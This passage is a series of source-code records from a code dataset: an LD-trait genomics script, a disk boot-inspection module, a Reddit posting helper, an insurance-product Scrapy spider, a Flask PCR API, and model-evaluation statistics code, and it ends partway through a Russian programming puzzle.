[i.strip() for i in pop_list]\n pop_ids = list(set(ids))\n\n # Get genomic coordinates from rs number from dbsnp151\n def get_coords(db, rsid):\n rsid = rsid.strip(\"rs\")\n query_results = db.dbsnp151.find_one({\"id\": rsid})\n query_results_sanitized = json.loads(json_util.dumps(query_results))\n return query_results_sanitized\n\n\n # Get rs number from genomic coordinates from dbsnp151\n def get_rsnum(db, coord):\n temp_coord = coord.strip(\"chr\").split(\":\")\n chro = temp_coord[0]\n pos = temp_coord[1]\n query_results = db.dbsnp151.find({\"chromosome\": chro, \"position\": pos})\n query_results_sanitized = json.loads(json_util.dumps(query_results))\n return query_results_sanitized\n\n # Replace input genomic coordinates with variant ids (rsids)\n def replace_coords_rsid(db, snp_lst):\n new_snp_lst = []\n for snp_raw_i in snp_lst:\n if snp_raw_i[0][0:2] == \"rs\":\n # print \"reached 1\", snp_raw_i\n new_snp_lst.append(snp_raw_i)\n else:\n # print \"reached 2\", snp_raw_i\n snp_info_lst = get_rsnum(db, snp_raw_i[0])\n if snp_info_lst != None:\n if len(snp_info_lst) > 1:\n var_id = \"rs\" + snp_info_lst[0]['id']\n ref_variants = []\n for snp_info in snp_info_lst:\n if snp_info['id'] == snp_info['ref_id']:\n ref_variants.append(snp_info['id'])\n if len(ref_variants) > 1:\n var_id = \"rs\" + ref_variants[0]\n if \"warning\" in output:\n output[\"warning\"] = output[\"warning\"] + \\\n \". Multiple rsIDs (\" + \", \".join([\"rs\" + ref_id for ref_id in ref_variants]) + \") map to genomic coordinates \" + snp_raw_i[0]\n else:\n output[\"warning\"] = \"Multiple rsIDs (\" + \", \".join([\"rs\" + ref_id for ref_id in ref_variants]) + \") map to genomic coordinates \" + snp_raw_i[0]\n elif len(ref_variants) == 0 and len(snp_info_lst) > 1:\n var_id = \"rs\" + snp_info_lst[0]['id']\n if \"warning\" in output:\n output[\"warning\"] = output[\"warning\"] + \\\n \". Multiple rsIDs (\" + \", \".join([\"rs\" + ref_id for ref_id in ref_variants]) + \") map to genomic coordinates \" + snp_raw_i[0]\n else:\n output[\"warning\"] = \"Multiple rsIDs (\" + \", \".join([\"rs\" + ref_id for ref_id in ref_variants]) + \") map to genomic coordinates \" + snp_raw_i[0]\n else:\n var_id = \"rs\" + ref_variants[0]\n new_snp_lst.append([var_id])\n elif len(snp_info_lst) == 1:\n var_id = \"rs\" + snp_info_lst[0]['id']\n new_snp_lst.append([var_id])\n else:\n new_snp_lst.append(snp_raw_i)\n else:\n new_snp_lst.append(snp_raw_i)\n return new_snp_lst\n\n sanitized_query_snps = replace_coords_rsid(db, sanitized_query_snps)\n\n\n # find genomic coords of query snps in dbsnp \n # query_snp_details = []\n # details = collections.OrderedDict()\n details = {}\n rs_nums = []\n snp_pos = []\n snp_coords = []\n warn = []\n # windowWarnings = []\n queryWarnings = []\n for snp_i in sanitized_query_snps:\n if (len(snp_i) > 0 and len(snp_i[0]) > 2):\n if (snp_i[0][0:2] == \"rs\" or snp_i[0][0:3] == \"chr\") and snp_i[0][-1].isdigit():\n # query variant to get genomic coordinates in dbsnp\n snp_coord = get_coords(db, snp_i[0])\n if snp_coord != None:\n rs_nums.append(snp_i[0])\n snp_pos.append(int(snp_coord['position']))\n temp = [snp_i[0], str(snp_coord['chromosome']), int(snp_coord['position'])]\n snp_coords.append(temp)\n else:\n # Generate warning if query variant is not found in dbsnp\n warn.append(snp_i[0])\n queryWarnings.append([snp_i[0], \"NA\", \"Variant not found in dbSNP\" + dbsnp_version + \", variant removed.\"])\n else:\n # Generate warning if query variant is not a genomic position or rs number\n warn.append(snp_i[0])\n queryWarnings.append([snp_i[0], \"NA\", \"Not a valid SNP, variant removed.\"])\n else:\n # Generate error for empty query variant\n output[\"error\"] = \"Input list of RS numbers is empty\"\n json_output = json.dumps(output, sort_keys=True, indent=2)\n print(json_output, file=out_json)\n out_json.close()\n return(\"\", \"\", \"\")\n\n # generate warnings for query variants not found in dbsnp\n if warn != []:\n output[\"warning\"] = \"The following RS number(s) or coordinate(s) were not found in dbSNP \" + \\\n dbsnp_version + \": \" + \", \".join(warn)\n\n # Generate errors if no query variants are valid in dbsnp\n if len(rs_nums) == 0:\n output[\"error\"] = \"Input SNP list does not contain any valid RS numbers that are in dbSNP \" + \\\n dbsnp_version + \".\"\n json_output = json.dumps(output, sort_keys=True, indent=2)\n print(json_output, file=out_json)\n out_json.close()\n return(\"\", \"\", \"\")\n\n thinned_list = []\n\n print(\"##### FIND GWAS VARIANTS IN WINDOW #####\")\t\n # establish low/high window for each query snp\n window = 500000 # -/+ 500Kb = 500,000Bp = 1Mb = 1,000,000 Bp total\n found = {}\t\n # calculate and store LD info for all LD pairs\t\n ldPairs = []\n # search query snp windows in gwas_catalog\n for snp_coord in snp_coords:\n # print(snp_coord)\n found[snp_coord[0]] = get_window_variants(db, snp_coord[1], snp_coord[2], window)\n # print(\"found\", snp_coord[0], len(found[snp_coord[0]]))\n if found[snp_coord[0]] is not None:\n thinned_list.append(snp_coord[0])\n # Calculate LD statistics of variant pairs ?in parallel?\t\n for record in found[snp_coord[0]]:\t\n ldPairs.append([snp_coord[0], str(snp_coord[1]), str(snp_coord[2]), \"rs\" + record[\"SNP_ID_CURRENT\"], str(record[\"chromosome_grch37\"]), str(record[\"position_grch37\"])])\t\n else:\t\n queryWarnings.append([snp_coord[0], \"chr\" + str(snp_coord[1]) + \":\" + str(snp_coord[2]), \"No variants found within window, variant removed.\"])\n \n ldPairsUnique = [list(x) for x in set(tuple(x) for x in ldPairs)]\t\n # print(\"ldPairsUnique\", ldPairsUnique)\t\n print(\"ldPairsUnique\", len(ldPairsUnique))\t\n print(\"##### BEGIN MULTITHREADING LD CALCULATIONS #####\")\t\n # start = timer()\t\n # leverage multiprocessing to calculate all LDpairs\t\n threads = 4\t\n splitLDPairsUnique = np.array_split(ldPairsUnique, threads)\t\n getLDStatsArgs = []\t\n for thread in range(threads):\t\n getLDStatsArgs.append([splitLDPairsUnique[thread].tolist(), pop_ids, thread])\t\n # print(\"getLDStatsArgs\", getLDStatsArgs)\t\n with Pool(processes=threads) as pool:\t\n ldInfoSubsets = pool.map(get_ld_stats_sub, getLDStatsArgs)\t\n \t\n # end = timer()\t\n # print(\"TIME ELAPSED:\", str(end - start) + \"(s)\")\t\n print(\"##### END MULTITHREADING LD CALCULATIONS #####\")\t\n # print(\"ldInfoSubsets\", json.dumps(ldInfoSubsets))\t\n # print(\"ldInfoSubsets length \", len(ldInfoSubsets))\t\n # merge all ldInfo Pool subsets into one ldInfo object\t\n ldInfo = {}\t\n for ldInfoSubset in ldInfoSubsets:\t\n for key in ldInfoSubset.keys():\t\n if key not in ldInfo.keys():\t\n ldInfo[key] = {}\t\n ldInfo[key] = ldInfoSubset[key]\t\n else:\t\n for subsetKey in ldInfoSubset[key].keys():\t\n ldInfo[key][subsetKey] = ldInfoSubset[key][subsetKey]\t\n\n # print(\"ldInfo\", json.dumps(ldInfo))\n \t\n for snp_coord in snp_coords:\t\n # print(\"snp_coord\", snp_coord)\n (matched_snps, window_problematic_snps) = get_gwas_fields(snp_coord[0], snp_coord[1], snp_coord[2], found[snp_coord[0]], pops, pop_ids, ldInfo, r2_d, r2_d_threshold)\n \n # windowWarnings += window_problematic_snps\n if (len(matched_snps) > 0):\n details[snp_coord[0]] = {\t\n \"aaData\": matched_snps\n }\n else:\n # remove from thinned_list\n thinned_list.remove(snp_coord[0])\n queryWarnings.append([snp_coord[0], \"chr\" + str(snp_coord[1]) + \":\" + str(snp_coord[2]), \"No variants in LD found within window, variant removed.\"]) \n\n # details[\"windowWarnings\"] = {\n # \"aaData\": windowWarnings\n # }\n details[\"queryWarnings\"] = {\n \"aaData\": queryWarnings\n }\n\n # Check if thinned list is empty, if it is, display error\n if len(thinned_list) < 1:\n output[\"error\"] = \"No variants in LD with GWAS Catalog.\"\n json_output = json.dumps(output, sort_keys=True, indent=2)\n print(json_output, file=out_json)\n out_json.close()\n return(\"\", \"\", \"\")\n\n # Return output\n json_output = json.dumps(output, sort_keys=True, indent=2)\n print(json_output, file=out_json)\n out_json.close()\n end = timer()\t\n print(\"TIME ELAPSED:\", str(end - start) + \"(s)\")\t\n print(\"##### LDTRAIT COMPLETE #####\")\n return (sanitized_query_snps, thinned_list, details)\n\n\ndef main():\n # snplst = sys.argv[1]\n snplst = \"5_LDtrait_snps.txt\"\n pop = \"YRI\"\n request = 8888\n web = False\n r2_d = \"r2\"\n r2_d_threshold = 0.1\n\n # Run function\n (sanitized_query_snps, thinned_list, details) = calculate_trait(snplst, pop, request, web, r2_d, r2_d_threshold)\n print(\"query_snps\", sanitized_query_snps)\n print(\"thinned_snps\", thinned_list)\n print(\"details\", json.dumps(details))\n\nif __name__ == \"__main__\":\n main()","sub_path":"LDlink/LDtrait.py","file_name":"LDtrait.py","file_ext":"py","file_size_in_byte":32130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"602272847","text":"#!/usr/bin/env python3\n# Copyright 2020 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Finds boot-related properties of disks.\n\nThis module supports offline inspection of block devices and\nvirtual disk files, with a focus on information that typically\nrequires booting the system.\n\nSee `model.InspectionResults` for which information is returned.\n\nIn terms of OS support, this module focuses on systems\nthat are runnable on Google Compute Engine, with a particular focus on the\nsystems that are importable to Google Compute Engine:\n https://cloud.google.com/compute/docs/import\n\nIn other words, it doesn't seek to exhaustively detect all systems,\nand will remove support for defunct systems over time.\n\"\"\"\n\nimport re\nimport sys\n\nfrom boot_inspect import model\nfrom boot_inspect.inspectors.os import architecture, linux, windows\nimport boot_inspect.system.filesystems\n\n\n_LINUX = [\n linux.Fingerprint(model.Distro.AMAZON, aliases=['amzn', 'amazonlinux']),\n linux.Fingerprint(\n model.Distro.CENTOS,\n legacy=linux.LegacyFingerprint(\n metadata_file='/etc/centos-release',\n version_pattern=re.compile(r'\\d+\\.\\d+'),\n derivative_metadata_files=[\n '/etc/fedora-release',\n '/etc/oracle-release',\n ]),\n ),\n linux.Fingerprint(\n model.Distro.DEBIAN,\n legacy=linux.LegacyFingerprint(\n metadata_file='/etc/debian_version',\n version_pattern=re.compile(r'\\d+\\.\\d+'),\n ),\n ),\n linux.Fingerprint(model.Distro.FEDORA),\n linux.Fingerprint(model.Distro.KALI),\n linux.Fingerprint(\n model.Distro.RHEL,\n legacy=linux.LegacyFingerprint(\n metadata_file='/etc/redhat-release',\n version_pattern=re.compile(r'\\d+\\.\\d+'),\n derivative_metadata_files=[\n '/etc/centos-release',\n '/etc/fedora-release',\n '/etc/oracle-release',\n ]),\n ),\n linux.Fingerprint(model.Distro.SLES, aliases=['sles_sap']),\n linux.Fingerprint(model.Distro.OPENSUSE, aliases=['opensuse-leap']),\n linux.Fingerprint(model.Distro.ORACLE, aliases=['ol', 'oraclelinux']),\n linux.Fingerprint(model.Distro.UBUNTU),\n]\n\n\ndef inspect_device(g, device: str) -> model.InspectionResults:\n \"\"\"Finds boot-related properties for a device using offline inspection.\n\n Args:\n g (guestfs.GuestFS): A launched, but unmounted, GuestFS instance.\n device: a reference to a mounted block device (eg: /dev/sdb), or\n to a virtual disk file (eg: /opt/images/disk.vmdk).\n\n Example:\n\n g = guestfs.GuestFS(python_return_dict=True)\n g.add_drive_opts(\"/dev/sdb\", format=\"raw\")\n g.launch()\n results = inspect_device(g, \"/dev/sdb\")\n \"\"\"\n\n roots = g.inspect_os()\n if len(roots) == 0:\n print('inspect_vm: no operating systems found', file=sys.stderr)\n sys.exit(1)\n root = roots[0]\n mount_points = g.inspect_get_mountpoints(root)\n for dev, mp in sorted(mount_points.items(), key=lambda k: len(k[0])):\n try:\n g.mount_ro(mp, dev)\n except RuntimeError as msg:\n print('%s (ignored)' % msg, file=sys.stderr)\n fs = boot_inspect.system.filesystems.GuestFSFilesystem(g)\n operating_system = linux.Inspector(fs, _LINUX).inspect()\n if not operating_system:\n operating_system = windows.Inspector(g, root).inspect()\n arch = architecture.Inspector(g, root).inspect()\n g.umount_all()\n\n return model.InspectionResults(\n device=device,\n os=operating_system,\n architecture=arch,\n )\n\n\ndef _linux_inspector(\n fs: boot_inspect.system.filesystems.Filesystem) -> linux.Inspector:\n \"\"\"Returns a linux.Inspector that is configured\n\n with all detectable Linux distros.\n \"\"\"\n return linux.Inspector(fs, _LINUX)\n","sub_path":"daisy_workflows/image_import/inspection/src/boot_inspect/inspection.py","file_name":"inspection.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"240035824","text":"import praw\nfrom praw.models import Submission\nfrom backend.api_keys import reddit_username, reddit_password, reddit_user_agent, reddit_client_id, reddit_client_secret\nfrom backend.log_util import log\n\nreddit_auth = praw.Reddit(client_id=reddit_client_id,\n client_secret=reddit_client_secret,\n password=reddit_password,\n user_agent=reddit_user_agent,\n username=reddit_username)\n\n\ndef submit_to_reddit(title, text, debug=False):\n \"\"\"\n Posts a link to the given subreddit\n :param debug: Submit to test subreddit if ture\n :param title: Title of the reddit post\n :param text: Text to add to the reddit self post\n \"\"\"\n if debug is True:\n subreddit = \"l3d00m\"\n else:\n subreddit = \"pietsmiet\"\n\n if (text == '') or (title == ''):\n log(\"Warning: Not submitting to reddit, null text or title\")\n return\n\n # Submit the post\n submission_url = reddit_auth.subreddit(subreddit).submit(title, selftext=text, resubmit=False,\n send_replies=False).shortlink\n log(\"Debug\", submission_url)\n return submission_url\n\n\ndef edit_submission(text, submission_url):\n if submission_url == \"\":\n log(\"EDIT: Submission url is empty\")\n return\n submission = Submission(reddit_auth, url=submission_url)\n submission.edit(text)\n log(\"Submission edited\")\n\n\ndef delete_submission(submission_url):\n if submission_url == \"\":\n log(\"Warning\", \"DELETE: Submission url is empty\")\n return\n submission = Submission(reddit_auth, url=submission_url)\n # Only remove the submission if there are less than 4 comments, otherwise unsticky\n comment_count = len(submission.comments.list())\n if comment_count < 5:\n submission.mod.remove()\n submission.mod.lock()\n log(\"Submission removed\")\n else:\n submission.mod.sticky(False)\n log(\"Submission unstickied\")\n","sub_path":"backend/reddit_util.py","file_name":"reddit_util.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"256895969","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom project_insurance_scrap.items import ProjectInsuranceScrapItem\nimport project_insurance_scrap.scrap_functions as shan\n\nclass A恒安标准Spider(scrapy.Spider):\n name = '恒安标准'\n #http://www.hengansl.com/cha/169455.html\n\n def start_requests(self):\n urls = ['http://www.hengansl.com/cha/2304450.html', #个人保险\n 'http://www.hengansl.com/cha/2304451.html', #团体保险\n 'http://www.hengansl.com/cha/49308255.html', #网销保险\n 'http://www.hengansl.com/cha/2304452.html', #银行保险\n 'http://www.hengansl.com/cha/2304453.html'] #多元保险\n for url in urls: \n yield scrapy.Request(url=url ,callback=self.parse)\n \n def parse(self, response):\n # 从每一行抽取数据\n result = response.css('.list_ul a , .list_title').extract()\n zs_result = result[(shan.which(shan.str_detect(\"在售\", result))[0]+1):shan.which(shan.str_detect(\"停售\", result))[0]]\n ts_result = result[(shan.which(shan.str_detect(\"停售\", result))[0]+1):len(result)]\n \n for part in zs_result:\n # 在售保险的内容输入\n item = ProjectInsuranceScrapItem() \n item['company_name'] = '恒安标准'\n item['product_name'] = shan.str_extract('>(.*?)</a>',part) \n item['product_sale_status'] = \"在售\" \n item['product_contract_link'] = shan.str_extract('href=\"(.*)\" target=',part) \n # 输出数据\n yield item \n \n for part in ts_result:\n # 在售保险的内容输入\n item = ProjectInsuranceScrapItem() \n item['company_name'] = '恒安标准'\n item['product_name'] = shan.str_extract('>(.*?)</a>',part) \n item['product_sale_status'] = \"停售\" \n item['product_contract_link'] = shan.str_extract('href=\"(.*)\" target=',part) \n # 输出数据\n yield item \n","sub_path":"project_insurance_scrap/spiders/a恒安标准.py","file_name":"a恒安标准.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103694869","text":"# -*- coding: utf-8 -*-\r\n# api.py\r\n\r\nfrom flask import Blueprint\r\nfrom flask_restful import Api\r\n\r\nfrom api.pcr import pcr\r\nfrom api.pcr import protocol as pcrProtocol\r\nfrom api.history import history as pcrHistory\r\n\r\n# list of PCR api\r\nbp_pcr = Blueprint('api_pcr', __name__)\r\nbp_pcr_protocol = Blueprint('api_pcr_protocol', __name__)\r\nbp_history = Blueprint('api_history', __name__)\r\n\r\n# For PCR API\r\napi_pcr = Api(bp_pcr)\r\n\r\napi_pcr.add_resource(pcr.Start, '/start')\r\napi_pcr.add_resource(pcr.Stop, '/stop')\r\napi_pcr.add_resource(pcr.Status, '/status')\r\napi_pcr.add_resource(pcr.ReloadProtocol, '/reloadProtocol')\r\n\r\n# For PCR Protocol Api\r\napi_pcr_protocol = Api(bp_pcr_protocol)\r\napi_pcr_protocol.add_resource(pcrProtocol.ProtocolList, '/list')\r\napi_pcr_protocol.add_resource(pcrProtocol.ProtocolSelect, '/select')\r\napi_pcr_protocol.add_resource(pcrProtocol.NewProtocol, '/new')\r\napi_pcr_protocol.add_resource(pcrProtocol.DeleteProtocol, '/delete')\r\napi_pcr_protocol.add_resource(pcrProtocol.EditProtocol, '/edit')\r\napi_pcr_protocol.add_resource(pcrProtocol.CheckProtocol, '/check')\r\n\r\n# For history API\r\napi_history = Api(bp_history)\r\napi_history.add_resource(pcrHistory.HistoryList, '/list')\r\napi_history.add_resource(pcrHistory.HistoryGraphData, '/graphdata')\r\napi_history.add_resource(pcrHistory.HistoryTempData, '/tempdata')\r\n","sub_path":"system/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"105335114","text":"import os\r\nimport pathlib\r\nimport re\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom sklearn.metrics import fbeta_score\r\n\r\nimport config\r\nfrom util import data_loader\r\nfrom util import keras_util\r\nfrom util import path\r\n\r\nRECORD_DIR = os.path.join(os.path.abspath(\".\"), \"record\")\r\n\r\n\r\ndef model_f2_statistics_no_repeat(all_label, one_label, thresholds, save_dir=None, save_file=None):\r\n all_label_best = {}\r\n one_label_best = [{} for i in range(13)]\r\n one_label_no_repeat = {}\r\n all_label_no_repeat = []\r\n for entry in all_label:\r\n if entry[0].split('.')[0] not in all_label_best:\r\n all_label_best[entry[0].split('.')[0]] = entry[1]\r\n all_label_no_repeat.append(entry)\r\n\r\n for label in one_label:\r\n for entry in one_label[label]:\r\n if entry[0].split('.')[0] not in one_label_best[label]:\r\n one_label_best[label][entry[0].split('.')[0]] = entry[1]\r\n if one_label_no_repeat.get(label) is None:\r\n one_label_no_repeat[label] = []\r\n one_label_no_repeat[label].append(entry)\r\n\r\n if save_file is not None:\r\n with open(os.path.join(save_dir, save_file), \"w\") as f:\r\n f.write(\"==========================All label==========================\\n\")\r\n for i in all_label_no_repeat:\r\n f.write(\"%f: %s\\n\" % (i[1], i[0]))\r\n\r\n for i in range(len(one_label_no_repeat)):\r\n f.write(\"\\n\\n\\n\\n\\n==========================One label: %d==========================\\n\" % i)\r\n for j in one_label_no_repeat[i]:\r\n f.write(\"%f: %s\\n\" % (j[1], j[0]))\r\n\r\n return all_label_no_repeat, one_label_no_repeat, thresholds\r\n\r\n\r\ndef model_f2_statistics(mode_path, val_index=1, save_dir=None, save_file=None):\r\n \"\"\"\r\n 对model目录下的所有包含\"evaluate\"字段的文件进行统计,分别得到all-label、one-label统计\r\n :param mode_path: 需要统计的目录\r\n :param save_file: 输入文件\r\n :return:\r\n \"\"\"\r\n evaluate_files = []\r\n for root, dirs, files in os.walk(mode_path):\r\n for file in files:\r\n if (\"val%d\" % val_index) not in root:\r\n continue\r\n if \"evaluate\" in file and \"evaluate_revise\" not in file:\r\n evaluate_files.append(os.path.join(root, file))\r\n\r\n all_label = {}\r\n one_label = {}\r\n label_f2_threshold = [{} for i in range(13)]\r\n for file in evaluate_files:\r\n with open(file, \"r\") as f:\r\n weight_file = \"\"\r\n for i in f.readlines():\r\n if \"Weight\" in i:\r\n # 不同人训练出来的模型中,weight_file的根路径不同,此处进行一个转换\r\n weight_file = os.path.join(path.root_path,\r\n pathlib.Path(re.match(r\"Weight:.*competition[\\\\/]*(.*)\", i).group(1)))\r\n if \"Greedy F2-Score is:\" in i:\r\n if weight_file == \"\":\r\n print(\"file %s is abnormal\" % file)\r\n greedy_f2 = i.split(\":\")[-1].strip()\r\n all_label[weight_file] = float(greedy_f2)\r\n if \"[label\" in i:\r\n if weight_file == \"\":\r\n print(\"file %s is abnormal\" % file)\r\n label = re.match(r\".*label *([0-9]*)\", i).group(1)\r\n greedy_f2 = re.match(r\".*greedy-f2=(.*)\\[\", i).group(1)\r\n threshold = re.match(r\".*greedy-f2=.*\\[(.*)\\]\", i).group(1)\r\n if one_label.get(int(label), None) is None:\r\n one_label[int(label)] = {}\r\n one_label[int(label)][weight_file] = float(greedy_f2)\r\n label_f2_threshold[int(label)][weight_file] = float(threshold)\r\n\r\n all_label = sorted(all_label.items(), key=lambda x: x[1], reverse=True)\r\n for i in range(len(one_label)):\r\n one_label[i] = sorted(one_label[i].items(), key=lambda x: x[1], reverse=True)\r\n\r\n if save_file is not None:\r\n with open(os.path.join(save_dir, save_file), \"w\") as f:\r\n f.write(\"==========================All label==========================\\n\")\r\n for i in all_label:\r\n f.write(\"%f: %s\\n\" % (i[1], i[0]))\r\n\r\n for i in range(len(one_label)):\r\n f.write(\"\\n\\n\\n\\n\\n==========================One label: %d==========================\\n\" % i)\r\n for j in one_label[i]:\r\n f.write(\"%f: %s\\n\" % (j[1], j[0]))\r\n\r\n return all_label, one_label, label_f2_threshold\r\n\r\n\r\ndef path_2_model_name(weight_path):\r\n tmp = os.path.split(weight_path)\r\n weight_name = tmp[-1]\r\n epoch = weight_name.split('.')[1]\r\n tmp = os.path.split(tmp[0])\r\n val = tmp[-1]\r\n tmp = os.path.split(tmp[0])\r\n model_number = tmp[-1]\r\n tmp = os.path.split(tmp[0])\r\n tmp = os.path.split(tmp[0])\r\n model_type = tmp[-1]\r\n\r\n return \"%s_%s_%s_%s\" % (model_type, model_number, val, epoch), (model_type, model_number, val, epoch)\r\n\r\n\r\ndef model_coor(model_statis: list, label, thresholds, val_index):\r\n _, val_files = data_loader.get_k_fold_files(\"1.txt\", val_index, [config.DATA_TYPE_ORIGINAL])\r\n y = data_loader.get_labels(val_files)\r\n y = np.array(y, np.int8).reshape((-1, 13))\r\n model_names = []\r\n model_predicts = []\r\n df = pd.DataFrame()\r\n for i in model_statis:\r\n weight_path = i[0]\r\n name, info = path_2_model_name(weight_path)\r\n if not os.path.exists(weight_path + \".predict.npy\"):\r\n continue\r\n predict = np.load(weight_path + \".predict.npy\")\r\n if thresholds is not None:\r\n for l in range(len(thresholds)):\r\n threshold = thresholds[l][weight_path]\r\n predict[:, l] = predict[:, l] > threshold\r\n\r\n predict = predict.astype(np.int8)\r\n\r\n try:\r\n\r\n if label is not None:\r\n predict = predict[:, label]\r\n f2 = fbeta_score(y[:, label], predict, beta=2)\r\n else:\r\n f2 = fbeta_score(y, predict, beta=2, average='macro')\r\n assert (f2 - i[1]) / i[1] < 0.01\r\n\r\n model_predicts.append(predict)\r\n model_names.append(name)\r\n df[name] = predict.flatten()\r\n except:\r\n print(weight_path)\r\n return df.corr()\r\n\r\n\r\ndef model_corr_heapmap(model_statis: list, label, thresholds, val_index, save_dir, save_file):\r\n corr = model_coor(model_statis, label, thresholds, val_index)\r\n heap_map(corr, save_dir, save_file)\r\n return corr\r\n\r\n\r\ndef heap_map(corr, save_dir, save_file):\r\n plt.gcf().clear()\r\n sns.set(font_scale=0.6)\r\n ax = sns.heatmap(corr, annot=True, annot_kws={\"size\": 5}, cmap='YlGnBu')\r\n ax.set_xticklabels(ax.get_xticklabels(), rotation=90)\r\n ax.set_yticklabels(ax.get_yticklabels(), rotation=0)\r\n ax.get_figure().savefig(os.path.join(save_dir, save_file), dpi=200, bbox_inches='tight')\r\n\r\n\r\ndef shord_board_statistics(label_statis_all, save_dir):\r\n shord_board_statis = [[] for i in range(5)]\r\n for val in range(5):\r\n label_statis_val = label_statis_all[val]\r\n for label in range(13):\r\n label_statis = label_statis_val[label]\r\n average = 0\r\n for i in range(5):\r\n average += label_statis[i][1] / 5\r\n shord_board_statis[val].append(average)\r\n\r\n with open(os.path.join(save_dir, \"short_board_statistics.txt\"), 'w+') as f:\r\n f.write(\"Top-5 f2-score average\\n\")\r\n for i in range(13):\r\n f.write(\"\\n#######label %d\\n\" % i)\r\n for j in range(5):\r\n f.write(\"val %d: %f\\n\" % (j + 1, shord_board_statis[j][i]))\r\n\r\n\r\ndef model_config_statistics(label_statis_all, save_dir):\r\n with open(os.path.join(save_dir, \"model_config_statistics.txt\"), \"w+\") as f:\r\n for label in range(13):\r\n f.write(\"##############################label %d##############################\\n\" % label)\r\n for val in range(5):\r\n f.write(\"---------------------val %d---------------------\\n\" % (val + 1))\r\n for rank in range(2):\r\n weight_file, f2 = label_statis_all[val][label][rank]\r\n _, model_config = keras_util.dynamic_model_import(weight_file)\r\n assert model_config.val_index == val + 1\r\n f.write(\"rank: %d, f2-score: %6f\\n\" % (rank, f2))\r\n f.write(\"model_name=%s\\n\" % model_config.model_name)\r\n f.write(\"image_resolution=%d\\n\" % model_config.image_resolution)\r\n f.write(\"data_type=%s\\n\" % str(model_config.data_type))\r\n f.write(\"label_position=%s\\n\" % str([str(i) for i in model_config.label_position]))\r\n\r\n f.write(\"train_file_cnt=%d\\n\" % model_config.train_file_cnt)\r\n f.write(\"val_file_cnt=%d\\n\" % model_config.val_file_cnt)\r\n try:\r\n f.write(\"label_color_augment=%s\\n\" % str([str(i) for i in model_config.label_color_augment]))\r\n f.write(\"color_augment_cnt=%d\\n\" % model_config.color_augment_cnt)\r\n except:\r\n pass\r\n\r\n try:\r\n f.write(\"label_up_sampling=%s\\n\" % str([str(i) for i in model_config.label_up_sampling]))\r\n f.write(\"label_up_sampling_cnt=%s\\n\" % str([str(i) for i in model_config.up_sampling_cnt]))\r\n except:\r\n pass\r\n\r\n try:\r\n f.write(\"down_sampling=%f\\n\" % model_config.downsampling)\r\n f.write(\"down_sampling_cnt=%d\\n\" % model_config.down_sampling_cnt)\r\n except:\r\n pass\r\n\r\n f.write(\"train_batch_size=%s\\n\" % str([str(i) for i in model_config.train_batch_size]))\r\n f.write(\"epoch=%s\\n\" % str([str(i) for i in model_config.epoch]))\r\n f.write(\"lr=%s\\n\" % str([str(i) for i in model_config.lr]))\r\n f.write(\"freeze_layers=%s\\n\" % str([str(i) for i in model_config.freeze_layers]))\r\n f.write(\"input_norm=%s\\n\" % model_config.input_norm)\r\n f.write(\"tta_flip=%s\\n\" % model_config.tta_flip)\r\n f.write(\"tta_crop=%s\\n\" % model_config.tta_crop)\r\n f.write(\"\\n\")\r\n\r\n\r\ndef do_statistics(target_dir, heapmap_num, short_board=False, model_config=False):\r\n one_label_all = []\r\n corr_all = [[] for i in range(5)]\r\n for val_index in range(1, 6):\r\n record_dir = os.path.join(target_dir, \"val%d\" % val_index)\r\n pathlib.Path(record_dir).mkdir(parents=True, exist_ok=True)\r\n\r\n all_label, one_label, thresholds = model_f2_statistics(path.MODEL_PATH, val_index, record_dir,\r\n \"statistics_val%d_all.txt\" % val_index)\r\n all_label, one_label, thresholds = model_f2_statistics_no_repeat(all_label, one_label, thresholds, record_dir,\r\n \"statistics_val%d_no_repeat.txt\" % val_index)\r\n one_label_all.append(one_label)\r\n\r\n model_corr_heapmap(all_label[:heapmap_num], None, thresholds, val_index, record_dir, \"label_all.png\")\r\n for i in range(13):\r\n corr = model_corr_heapmap(one_label[i][:heapmap_num], i, thresholds, val_index, record_dir,\r\n 'label_%d.png' % i)\r\n corr_all[val_index - 1].append(corr)\r\n if short_board:\r\n shord_board_statistics(one_label_all, target_dir)\r\n if model_config:\r\n model_config_statistics(one_label_all, target_dir)\r\n\r\n return one_label_all, corr_all\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # do_statistics(RECORD_DIR, 20)\r\n do_statistics(RECORD_DIR, 20, short_board=True, model_config=True)\r\n","sub_path":"util/model_statistics.py","file_name":"model_statistics.py","file_ext":"py","file_size_in_byte":12063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"289322410","text":"\"\"\"\nФермер Николай нанял двух лесорубов: Дмитрия и Федора,\nчтобы вырубить лес, на месте которого должно быть кукурузное поле.\nВ лесу растут X деревьев.\n\nДмитрий срубает по A деревьев в день, но каждый K-й день он отдыхает\nи не срубает ни одного дерева. Таким образом, Дмитрий отдыхает в K-й,\n2K-й, 3K-й день, и т.д.\n\nФедор срубает по B деревьев в день, но каждый M-й день он отдыхает\nи не срубает ни одного дерева. Таким образом, Федор отдыхает в M-й,\n2M-й, 3M-й день, и т.д.\n\nЛесорубы работают параллельно и, таким образом, в дни, когда никто\nиз них не отдыхает, они срубают A + B деревьев, в дни, когда отдыхает\nтолько Федор — A деревьев, а в дни, когда отдыхает только Дмитрий 